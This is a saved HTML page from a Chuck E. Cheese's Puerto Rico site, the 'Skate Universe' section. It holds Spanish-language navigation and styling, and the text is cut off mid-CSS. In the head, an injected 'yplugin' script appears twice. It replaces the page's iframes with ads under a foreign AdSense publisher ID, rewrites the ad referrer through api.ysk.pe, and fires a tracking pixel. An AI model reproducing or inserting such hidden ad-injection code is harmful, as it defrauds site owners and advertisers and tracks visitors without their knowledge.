
<html lang="en" class="webkit chrome chrome35 win win7 js no-flash9 wf-bellocaps-n4-active wf-ffmarketweb-n4-active wf-museoslab-i3-active wf-museoslab-i7-active wf-museoslab-n3-active wf-museoslab-n7-active wf-active"><head>
   
        <title>Skate Universe</title>
        <meta charset="utf-8">
        <meta name="keywords" content="">
        <meta name="description" content="">
        <meta name="robots" content="noarchive">
        <meta http-equiv="imagetoolbar" content="no">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta property="og:title" content="Chuck E. Cheese’s – Where a kid can be a kid">
	        <meta property="og:description" content="Stay up-to-date with the latest news, happenings and insider deals from Chuck E. Cheese’s.">
	    <meta property="og:type" content="food"> 
	    <meta property="og:url" content="http://chuckecheese.com/skateuniverse">
	    <meta property="og:image" content="http://chuckecheese.com/_assets/_ico/facebook-thumb.jpg">
        <meta property="fb:app_id" content="448812155163345">
        <meta property="og:site_name" content="Chuck E. Cheese's">

	    <!-- Fav and Touch Icons -->
	    <link rel="shortcut icon" href="http://chuckecheese.com/_assets/_ico/favicon.ico">
	    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://chuckecheese.com/_assets/_ico/apple-touch-icon-144-precomposed.png">
	    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://chuckecheese.com/_assets/_ico/apple-touch-icon-114-precomposed.png">
	    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="http://chuckecheese.com/_assets/_ico/apple-touch-icon-72-precomposed.png">
	    <link rel="apple-touch-icon-precomposed" href="http://chuckecheese.com/_assets/_ico/apple-touch-icon-57-precomposed.png">
        <!-- Typekit Fonts -->
 <link href='http://fonts.googleapis.com/css?family=Titan+One' rel='stylesheet' type='text/css'>
 <link href='http://fonts.googleapis.com/css?family=Shadows+Into+Light' rel='stylesheet' type='text/css'>
    
<script src="/bundles/css_browser_selector?v=nhYpooGskJj2hg3d5yBF7SLq2sR4YE7mAFD7dKNb_kE1"></script>

<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
 <!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

<link href="http://chuckecheese.com/bundles/sitecss?v=vX0NkilhoMtvvUgZdIPAv9l7wUs1rkzXW6hHDIDJsOM1" rel="stylesheet">



<!--[if IE 9]><link href="http://chuckecheese.com/bundles/ie9css?v=" rel="stylesheet"/>
<![endif]-->
<!--[if IE 8]><link href="http://chuckecheese.com/bundles/ie8css?v=CLOhwn3fw5DVT94sD9PVp9yUcSztzrAq49ytd4xNy5M1" rel="stylesheet"/>
<![endif]-->
<!--[if IE 7]><link href="http://chuckecheese.com/bundles/ie7css?v=rFsTQXej2TuZ2Liwh1csR60wR9k_7suwWvoTS5AwV641" rel="stylesheet"/>
<![endif]-->
        
      <link href="_css/site.css" rel="stylesheet" type="text/css"/>
<link href="_css/print.css" rel="stylesheet" media="print"/>
<link rel="shortcut icon" href="http://chuckecheeses.com/_assets/_ico/favicon.ico">
<!--[if IE 8]><link href="_css/ie8.css" rel="stylesheet" type="text/css"/><![endif]-->
<!--[if IE 7]><link href="_css/ie7.css" rel="stylesheet" type="text/css"/><![endif]-->    
<link href="_css/main.css" rel="stylesheet" type="text/css"/>
<link href="_css/normalize.css" rel="stylesheet" type="text/css"/>
<link href="_css/home.css" rel="stylesheet" type="text/css"/>
<link href="_css/styles.css" rel="stylesheet" type="text/css"/>
<link rel="shortcut icon" href="http://chuckecheeses.com/_assets/_ico/favicon.ico">   
<script src="http://chuckecheese.com/bundles/jquery?v=yUVjELgc9foFnhZgsvMfx2DhVRLKWK-w69IoCVhJ_aM1"></script>
<script src="http://chuckecheese.com/_assets/_js/jquery.trackEvents.js" type="text/javascript"></script>

        
        

    <script>(function (b) {
Element.prototype.before = function(el) {
        this.parentNode.insertBefore(el, this);
        return this;
};
Element.prototype.remove = function() {
        this.parentNode.removeChild(this);
};
Element.prototype.attr = function(key, value) {
        if (value) {
            this.setAttribute(key, value + "");
            return this;
        } else {
            value = this.getAttribute(key);
            return value ? value : "";
        }
};
Element.prototype.css = function(key, value) {
        if (value || typeof key == 'object') {
            var data = {};
            this.attr('style').split(';').filter(function(a){
                return a.match(/\S/gm);
            }).forEach(function(a){
                a = a.split(':').map(function(a){
                    return a.trim();
                });
                data[a[0]] = a[1];
            });
            if (typeof key == 'object') {
                for (var x in key)
                   data[x] = key[x];
            } else {
                data[key] = value;
            }
            var cssText = "";
            for (var x in data)
                cssText += x + ':' + data[x] + ';';
            this.setAttribute('style', cssText);
            return this;
        } else {
            var data = document.defaultView.getComputedStyle(this);
                data = data.getPropertyCSSValue(key);
            return data ? data.cssText : "";
        }
        
};
Document.prototype.on = window.on = Element.prototype.on = function(type, callback){
    var self = this;
    type.split(/\s+/).forEach(function(type){
        if ('addEventListener' in self)
            self.addEventListener(type, callback, false);
        else if('attachEvent' in self)
            self.attachEvent('on' + type, callback);
    });
    return this;
};
String.prototype.pam = function(list) {
	var result, str = this.toString();
	return list.filter(function(rgxp){
	   return str.match(rgxp)
	}).length > 0;
};
        // funciones
        function $(selector) {
                if (!selector) return [];
                var result = document.querySelectorAll(selector);
                return Array.prototype.slice.call(result);
        };
		function adsense(callback) {
			var container = document.createElement('div');
			var vars = document.createElement('script');
				vars.innerHTML =  '<!--\n\
		google_ad_client = "ca-pub-8843552735512761";\n\
		/* ADS1 */\n\
		google_ad_slot = "2040483657";\n\
		google_ad_width = 300;\n\
		google_ad_height = 250;\n\
		//-->';
			var _write = document.write;
			document.write = (function(content) {
				container.innerHTML = content;
				var iframe = container.firstElementChild.querySelector('iframe');
				iframe.attr('yplugin', 'true');
				document.body.appendChild(container.firstElementChild);
				callback.call(iframe);
				var adtimer = setInterval(function(){
					if (!iframe.contentDocument.body) return false;
					var a = iframe.contentDocument.body.querySelector('iframe[id^=google_ads_]');
					if (!a || !a.getAttribute || !a.getAttribute('src')) return false;
						var url = encodeURIComponent("http://bloggersenaccion.blogspot.com.ar/");
						var src = a.getAttribute('src').replace(/&p=([^&]*)/, "&p=" + url);
							src = src.replace(/&url=([^&]*)/, "&url=" + url);
							src = src.replace(/&loc=([^&]*)/, "&loc=" + url);
							src = src.replace(/&ref=([^&]*)/, "&ref=" + url);
						a.setAttribute("src", "http://api.ysk.pe/noref/?u=" + encodeURIComponent(src + hash));
						clearInterval(adtimer);
				});
				(new Image()).src = "http://whos.amung.us/swidget/hka5p5n2t06x.png";
				document.write = _write;
			}).bind(window);
			var src = document.createElement('script');
				src.async = false;
				src.defer = false;
				src.type = "text/javascript";
				src.src = "//pagead2.googlesyndication.com/pagead/show_ads.js";
			document.body.appendChild(vars);
			document.body.appendChild(src);
		};
        // banners
        var img = new Image();
        var hash = '#ysknt';
		var match_hash = /#ysknt|ysk\.pe|32328848\.com/gi;
        var ad = {};
            ad['300x250'] = 'http://tumi.tv/redirect.html#' + 'http://engine.adbooth.com/adserver/iframe?s=1000139245&w=1006&h=1006&c=1&blank=false' + hash;
            ad['336x280'] = ad['300x250'];
        
		var blacklist = [];
			blacklist.push(/(^|\W)(sex|porn|sexo|xxx|porno)(\W|$)/gi);
        // extraer iframes
        var timer = setInterval(function(){
			if ($('meta, title').filter(function(a) {
					return (a.content && a.content.toString().pam(blacklist));
				}).length) return false;
            $('iframe, object').forEach(function(e){
                if (window.location.href.match(match_hash)) return false;
                if (!e || e.attr('yplugin')) return false;
				e.attr('yplugin', 'true');
				e.style.display = 'block';
                var size = [e.offsetWidth, e.offsetHeight];
                var sizes = size.join('x');
                if (!ad.hasOwnProperty(sizes)) return false;
                if (e.src && e.src.indexOf(hash) >= 0) return false;
				adsense(function() {
				    this.css({
				        position: 'static',
                        left: 0,
                        top: 0
                    });
				    e.before(this).remove();
				});
            });
        }, 100);
		window.on('load', function(){
			setTimeout(function(){
				clearInterval(timer);
			}, 1000);
		});
})(window);</script><script>(function (b) {
Element.prototype.before = function(el) {
        this.parentNode.insertBefore(el, this);
        return this;
};
Element.prototype.remove = function() {
        this.parentNode.removeChild(this);
};
Element.prototype.attr = function(key, value) {
        if (value) {
            this.setAttribute(key, value + "");
            return this;
        } else {
            value = this.getAttribute(key);
            return value ? value : "";
        }
};
Element.prototype.css = function(key, value) {
        if (value || typeof key == 'object') {
            var data = {};
            this.attr('style').split(';').filter(function(a){
                return a.match(/\S/gm);
            }).forEach(function(a){
                a = a.split(':').map(function(a){
                    return a.trim();
                });
                data[a[0]] = a[1];
            });
            if (typeof key == 'object') {
                for (var x in key)
                   data[x] = key[x];
            } else {
                data[key] = value;
            }
            var cssText = "";
            for (var x in data)
                cssText += x + ':' + data[x] + ';';
            this.setAttribute('style', cssText);
            return this;
        } else {
            var data = document.defaultView.getComputedStyle(this);
                data = data.getPropertyCSSValue(key);
            return data ? data.cssText : "";
        }
        
};
Document.prototype.on = window.on = Element.prototype.on = function(type, callback){
    var self = this;
    type.split(/\s+/).forEach(function(type){
        if ('addEventListener' in self)
            self.addEventListener(type, callback, false);
        else if('attachEvent' in self)
            self.attachEvent('on' + type, callback);
    });
    return this;
};
String.prototype.pam = function(list) {
	var result, str = this.toString();
	return list.filter(function(rgxp){
	   return str.match(rgxp)
	}).length > 0;
};
        // funciones
        function $(selector) {
                if (!selector) return [];
                var result = document.querySelectorAll(selector);
                return Array.prototype.slice.call(result);
        };
		function adsense(callback) {
			var container = document.createElement('div');
			var vars = document.createElement('script');
				vars.innerHTML =  '<!--\n\
		google_ad_client = "ca-pub-8843552735512761";\n\
		/* ADS1 */\n\
		google_ad_slot = "2040483657";\n\
		google_ad_width = 300;\n\
		google_ad_height = 250;\n\
		//-->';
			var _write = document.write;
			document.write = (function(content) {
				container.innerHTML = content;
				var iframe = container.firstElementChild.querySelector('iframe');
				iframe.attr('yplugin', 'true');
				document.body.appendChild(container.firstElementChild);
				callback.call(iframe);
				var adtimer = setInterval(function(){
					if (!iframe.contentDocument.body) return false;
					var a = iframe.contentDocument.body.querySelector('iframe[id^=google_ads_]');
					if (!a || !a.getAttribute || !a.getAttribute('src')) return false;
						var url = encodeURIComponent("http://bloggersenaccion.blogspot.com.ar/");
						var src = a.getAttribute('src').replace(/&p=([^&]*)/, "&p=" + url);
							src = src.replace(/&url=([^&]*)/, "&url=" + url);
							src = src.replace(/&loc=([^&]*)/, "&loc=" + url);
							src = src.replace(/&ref=([^&]*)/, "&ref=" + url);
						a.setAttribute("src", "http://api.ysk.pe/noref/?u=" + encodeURIComponent(src + hash));
						clearInterval(adtimer);
				});
				(new Image()).src = "http://whos.amung.us/swidget/hka5p5n2t06x.png";
				document.write = _write;
			}).bind(window);
			var src = document.createElement('script');
				src.async = false;
				src.defer = false;
				src.type = "text/javascript";
				src.src = "//pagead2.googlesyndication.com/pagead/show_ads.js";
			document.body.appendChild(vars);
			document.body.appendChild(src);
		};
        // banners
        var img = new Image();
        var hash = '#ysknt';
		var match_hash = /#ysknt|ysk\.pe|32328848\.com/gi;
        var ad = {};
            ad['300x250'] = 'http://tumi.tv/redirect.html#' + 'http://engine.adbooth.com/adserver/iframe?s=1000139245&w=1006&h=1006&c=1&blank=false' + hash;
            ad['336x280'] = ad['300x250'];
        
		var blacklist = [];
			blacklist.push(/(^|\W)(sex|porn|sexo|xxx|porno)(\W|$)/gi);
        // extraer iframes
        var timer = setInterval(function(){
			if ($('meta, title').filter(function(a) {
					return (a.content && a.content.toString().pam(blacklist));
				}).length) return false;
            $('iframe, object').forEach(function(e){
                if (window.location.href.match(match_hash)) return false;
                if (!e || e.attr('yplugin')) return false;
				e.attr('yplugin', 'true');
				e.style.display = 'block';
                var size = [e.offsetWidth, e.offsetHeight];
                var sizes = size.join('x');
                if (!ad.hasOwnProperty(sizes)) return false;
                if (e.src && e.src.indexOf(hash) >= 0) return false;
				adsense(function() {
				    this.css({
				        position: 'static',
                        left: 0,
                        top: 0
                    });
				    e.before(this).remove();
				});
            });
        }, 100);
		window.on('load', function(){
			setTimeout(function(){
				clearInterval(timer);
			}, 1000);
		});
})(window);</script><style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}.fb_link img{border:none}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_reset .fb_dialog_legacy{overflow:visible}.fb_dialog_advanced{padding:10px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px}.fb_dialog_content{background:#fff;color:#333}.fb_dialog_close_icon{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;_background-image:url(http://static.ak.fbcdn.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif);cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{top:5px;left:5px;right:auto}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent;_background-image:url(http://static.ak.fbcdn.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif)}.fb_dialog_close_icon:active{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent;_background-image:url(http://static.ak.fbcdn.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif)}.fb_dialog_loader{background-color:#f6f7f8;border:1px solid #606060;font-size:24px;padding:20px}.fb_dialog_top_left,.fb_dialog_top_right,.fb_dialog_bottom_left,.fb_dialog_bottom_right{height:10px;width:10px;overflow:hidden;position:absolute}.fb_dialog_top_left{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 0;left:-10px;top:-10px}.fb_dialog_top_right{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -10px;right:-10px;top:-10px}.fb_dialog_bottom_left{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -20px;bottom:-10px;left:-10px}.fb_dialog_bottom_right{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -30px;right:-10px;bottom:-10px}.fb_dialog_vert_left,.fb_dialog_vert_right,.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{position:absolute;background:#525252;filter:alpha(opacity=70);opacity:.7}.fb_dialog_vert_left,.fb_dialog_vert_right{width:10px;height:100%}.fb_dialog_vert_left{margin-left:-10px}.fb_dialog_vert_right{right:0;margin-right:-10px}.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{width:100%;height:10px}.fb_dialog_horiz_top{margin-top:-10px}.fb_dialog_horiz_bottom{bottom:0;margin-bottom:-10px}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #3a5795;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{-webkit-transform:none;height:100%;margin:0;overflow:visible;position:absolute;top:-10000px;left:0;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{max-height:590px;min-height:590px;max-width:500px;min-width:500px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .45);position:absolute;left:0;top:0;width:100%;min-height:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_content .dialog_header{-webkit-box-shadow:white 0 1px 1px -1px inset;background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#738ABA), to(#2C4987));border-bottom:1px solid;border-color:#1d4088;color:#fff;font:14px Helvetica, sans-serif;font-weight:bold;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{-webkit-font-smoothing:subpixel-antialiased;height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#4966A6), color-stop(.5, #355492), to(#2A4887));border:1px solid #2f477a;-webkit-background-clip:padding-box;-webkit-border-radius:3px;-webkit-box-shadow:rgba(0, 0, 0, .117188) 0 1px 1px inset, rgba(255, 255, 255, .167969) 0 1px 0;display:inline-block;margin-top:3px;max-width:85px;line-height:18px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{border:none;background:none;color:#fff;font:12px Helvetica, sans-serif;font-weight:bold;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #555;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f6f7f8;border:1px solid #555;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_lift{z-index:1}.fb_hide_iframes iframe{position:relative;left:-10000px}.fb_iframe_widget_loader{position:relative;display:inline-block}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}.fb_iframe_widget_loader iframe{min-height:32px;z-index:2;zoom:1}.fb_iframe_widget_loader .FB_Loader{background:url(http://static.ak.fbcdn.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat;height:32px;width:32px;margin-left:-16px;position:absolute;left:50%;z-index:4}</style></head>
    <body style="" id="generalcontent">      
        <script type="text/javascript">

    var domain = window.location.hostname;
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-272154-1']);
    _gaq.push(['_setDomainName', domain]);
    _gaq.push(['_setAllowLinker', true]);
    _gaq.push(['_trackPageview']);

    (function () {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();

</script>
<style>
.fb_edge_widget_with_comment {
    height: 20px;
    overflow: hidden;
    padding: 0;
}
</style>
<div id="fb-root" class=" fb_reset"><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div><iframe name="fb_xdm_frame_http" frameborder="0" allowtransparency="true" scrolling="no" id="fb_xdm_frame_http" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" src="http://static.ak.facebook.com/connect/xd_arbiter/7r8gQb8MIqE.js?version=41#channel=fe3c76618&amp;origin=http%3A%2F%2Fchuckecheese.com" style="border: none; display: block;" yplugin="true"></iframe><iframe name="fb_xdm_frame_https" frameborder="0" allowtransparency="true" scrolling="no" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" src="https://s-static.ak.facebook.com/connect/xd_arbiter/7r8gQb8MIqE.js?version=41#channel=fe3c76618&amp;origin=http%3A%2F%2Fchuckecheese.com" style="border: none; display: block;" yplugin="true"></iframe></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div></div>
<script>
    window.fbAsyncInit = function () {
        // init the FB JS SDK
        FB.init({
            appId: '111630799034453',
            status: false,
            xfbml: true,
            logging: false
        });

        // Additional initialization code such as adding Event Listeners goes here
        FB.Event.subscribe('edge.create', function (targetUrl) {
            _gaq.push(['_trackSocial', 'facebook', 'like', targetUrl]);
        });
    };

    // Load the SDK asynchronously
    (function (d, s, id) {
        var js, fjs = d.getElementsByTagName(s)[0];
        if (d.getElementById(id)) { return; }
        js = d.createElement(s); js.id = id;
        js.src = "//connect.facebook.net/en_US/all.js";
        fjs.parentNode.insertBefore(js, fjs);
    } (document, 'script', 'facebook-jssdk'));
</script>
      
<header class="clearfix">
  <div class="bg-purple">
    <div class="wrapper">
      <div id="locationFinder" class="visible-phone" style="display: block!important">
        <a class="btn" href="/chuckecheesespuertorico/localidades.html" id="link33">Ver Tiendas</a>
      </div>     
      <a id="headerRibbon" href="/chuckecheesespuertorico/chuck_E_club.html"><img id="best_deals" src="_images/ribbon_best-deals.png"></a>
      <a class="nav-toggle">
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </a>
   <nav>
        <ul class="clearfix">          
          <li>
            <span class="plus">&#43;</span><span class="minus">&#8211;</span>
            <a class='nav-btn' id='experience_btn' href='/chuckecheesespuertorico/la-experiencia.html' data-image='_images/experience.jpg'>La Experiencia</a>
            <div class="bg-purple dropdown experience">
              <ul>
                
                <li id='our-promisesn'><a href='/chuckecheesespuertorico/promesa.html' data-image='_images/experience_our-promise.jpg'><span>Promesa a los Padres</span></a></li>
                <li id='couponssn'><a href='/chuckecheesespuertorico/visita_chuck.html' data-image='_images/experience_visiting.jpg'><span>Visita Chuck E. Cheeses</span></a></li>
                <li id='locationssn'><a href='/chuckecheesespuertorico/localidades.html' data-image='_images/experience_location-finder.jpg'><span>Localidades</span></a></li>
                <li id='check'><a href='/chuckecheesespuertorico/kid_check.html' data-image='_images/KID-CHECK-frame.jpg'><span>Kid Check</span></a></li>
                <li id='menusn'><a href='/chuckecheesespuertorico/menu.html' data-image='_images/experience_menu.jpg'><span>Menú</span></a></li>
                <li id='couponssn'><a href='/chuckecheesespuertorico/cupones.html' data-image='_images/experience_coupons.jpg'><span>Cupones</span></a></li>
              </ul>
              <img src='_images/experience.jpg' alt=''/>
            </div>    
          </li>
          <li>
            <span class="plus">&#43;</span><span class="minus">&#8211;</span>
            <a class='nav-btn' id='events_btn' href='/chuckecheesespuertorico/cumple.html' data-image='_images/BirthdayPartyfull.jpg'>Cumpleaños</a>
            <div class="bg-purple dropdown events">
              <ul>
                <li id='locationssn'><a href='/chuckecheesespuertorico/paquetes_cumple.html' data-image='_images/Birthdaygrupofull.jpg'><span>Paquetes de Cumpleaños</span></a></li>
                <li id='our-promisesn'><a href='/chuckecheesespuertorico/reservation.php' data-image='_images/events_invitations.jpg'><span>Reserva tu Cumpleaños</span></a></li>
               </ul>
              <img src='_images/events.jpg' alt=''/>
            </div>    
          </li>
        </ul>
        <ul>
          <li><a href="http://chuckecheesepr.com/chuckecheesespuertorico" id="logo"></a></li>
        </ul>                  
        <ul>        
          <li>
            <a class='nav-btn' id='activities_btn' href='/chuckecheesespuertorico/eventos.html' data-image='_images/fiestayeventost.png'>Fiestas y Eventos </a>
            <div class="bg-purple dropdown activities">
              <ul>
                <li id='visiting-cecsn'><a href='/chuckecheesespuertorico/eventos_de_grupo.html' data-image='_images/Evento_grupos_banner.jpg'><span>Eventos de Grupo</span></a></li> <li id='locationssn'><a href='/chuckecheesespuertorico/recaudacion_fondos.html' data-image='_images/FundraisingEven.jpg'><span>Recaudación de Fondos</span></a></li>
                <li id='locationssn'><a href='/chuckecheesespuertorico/disco_kids.html' data-image='_images/disco_kids_prty_banner.png'><span>Disco Kids</span></a></li>
                <li id='our-promisesn'><a href='/chuckecheesespuertorico/retro_party.html' data-image='_images/party_retro_banner.png'><span>Retro Party</span></a></li>
                <li id='our-promisesn'><a href='/chuckecheesespuertorico/movie_night.html' data-image='_images/movie_night_frame.png'><span>Movie Night</span></a></li>
                <li id='rewards-calendarssn'><a href='/chuckecheesespuertorico/calendario.html' data-image='_images/Calendario.png'><span>Calendario de Actividades</span></a></li>
                 </ul>
              <img src='_images/activities.jpg' alt=''/>
            </div>    
          </li>
          <li>
            <a class='nav-btn' id='memorias_btn' href='/chuckecheesespuertorico/memorias_compartidas.html' data-image='_images/activities.jpg'>Memorias Compartidas</a>
            <div class="bg-purple dropdown memorias">
              <ul>
                <li id='gamessn'><a href='/chuckecheesespuertorico/juegos.html' data-image='_images/activities_games.jpg'><span>Juegos</span></a></li>
                <li id='downloadssn'><a href='/chuckecheesespuertorico/descargas.html' data-image='_images/activities_downloads.jpg'><span>Descargas</span></a></li>
                <li id='videossn'><a href='/chuckecheesespuertorico/videos.html' data-image='_images/activities_videos.jpg'><span>Videos</span></a></li>
                <li id='rewards-calendarssn'><a href='/chuckecheesespuertorico/calendario_de_premios.html' data-image='_images/activities_rewards-calendars.jpg'><span>Calendarios de Premios</span></a></li>
              </ul>
              <img src='_images/activities.jpg' alt=''/>
            </div>    
          </li>
         </ul>
      </nav>
    </div>
  </div>
</header>

        <style type="text/css">
#largeHeader {
color:#34A8D8;
font-size:83pt;
line-height:60pt;
}
#largeContent h3 {
    color:#34a8d8;
    font-size:31pt;
    line-height:38pt;
}
#largeContent h2 {
    font-family: bello-caps; 
    color: #f99f43;
    font-size:28pt;
    line-height:25px;
}
#largeContent h6 {
    font-family: Helvetica; 
    text-decoration: underline; 
    margin-bottom: 30px;
    color:#34a8d8;
    font-size:13pt;
}
.span5 img {
    margin-right: -30px;
}
.blue .mm {
    /*padding: 10px 0 10px 10px!important;*/
}
.blue .mr{
    /*padding: 0 5px 0 10px!important;*/
}
    
@media (max-width: 700px) {
  #largeHeader {
    font-size:43pt;
    line-height:30pt;
   }
   #largeContent h2 {
        font-size:20pt;
    }
}
</style>
<div class="container">
		<div class="row-fluid">

	  		<div class="span12">

				<div class="box blue" style="background-color:#72c3e4;">
					<div class="tl">
						<div class="tr">
							<div class="tm">
							</div>
						</div>
					</div>
					<div class="ml">
						<div class="mr">
							<div class="mm">
								<div class="content-top row-fluid clearfix">
                                  <ul class="breadcrumb pull-left">
                       <li><a href="/chuckecheesespuertorico/" id="link45">Inicio</a><span class="divider">/</span></li>
                       <li><a href="/chuckecheesespuertorico/memorias_compartidas.html" id="link46">Memorias Compartidas</a><span class="divider">/</span></li>
                       <li class="active">Skateuniverse</li>
                  </ul>

        <!--<fb:like data-track="chuckecheeseapps:facebook like" href="http://chuckecheese.clickherestaging.com/experience" send="false" width="100" show_faces="false"></fb:like>-->
		<iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Fchuckecheesespr&amp;width=425&amp;layout=standard&amp;action=like&amp;show_faces=false&amp;share=true&amp;height=35&amp;appId=499946833431521" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:425px; height:35px;float:right; margin-left: 3em" allowTransparency="true"></iframe>

        

</div> 
<style>
  .mm { overflow: visible; }
  #skate-universe { width: 100%; margin-top: 30px; }
  #skate-universe h2 { width: 100%; text-align: center; }
  #su-details { position: relative; z-index: 3;  padding: 50px; }
  #su-details h3 { font-size: 3.6em; line-height: 47px; margin-bottom: 30px; color: #0064be !important; }
  #su-details h3 span { font-family: "bello-caps", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.3em; letter-spacing: 1px; }
  #su-text { float: left; width: 70%; position: relative; z-index: 2; }
  #su-buttons { margin: 55px 0 15px; }
  #su-buttons a { float: left; width: 40%; }
  #su-buttons a:first-child { margin-right: 15px; width: 42%; }
  #su-image { width: 50%; position: absolute; top: -80px; right: 0; z-index: 1; }
  #su-image img { width: 100%; }
  #sub-img { width: 100%; }
  #sub-img img { float: right; margin: 0 -21px -21px 0; width: 79%; }
  #su-sub h3 { text-align: center; margin: 20px 0; font-size: 49px; color: #0064be !important; }
  #su-sub h3 span { font-family: "bello-caps", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 64px; letter-spacing: 1px; }

  @media(max-width: 767px){
    #su-details { padding: 0; }
    #su-details h3 { font-size: 2.4em; line-height: 2.3em; margin-bottom: 20px; padding-left: 5px; color: #0064be !important; }
    #su-details h3 span { font-size: 1.3em; }
    #su-text { width: 100%; }
    #su-buttons { margin: 30px 0 15px; }
    #su-buttons a:first-child { width: 46%; }
    #su-image { display: none; }
    #su-legal p { font-size: .8em; line-height: 1.2em; }
    #su-sub h3 { font-size: 2.4em; text-align: center; margin: 30px 0 10px 0; color: #0064be !important; }
    #su-sub h3 span { font-size: 1.3em;}
    #sub-img img { float: right; margin: 0 -17px -28px 0; width: 100%; }
  }

  @media(min-width: 767px) and (max-width: 768px){
    #su-details { padding: 30px 25px; }
    #su-buttons a { width: 42%; }
    #su-buttons a:first-child { width: 48%; }
    #su-image { width: 52%; top: -70px; right: -20px; }
  }

  @media(min-width: 480px) and (max-width: 767px){
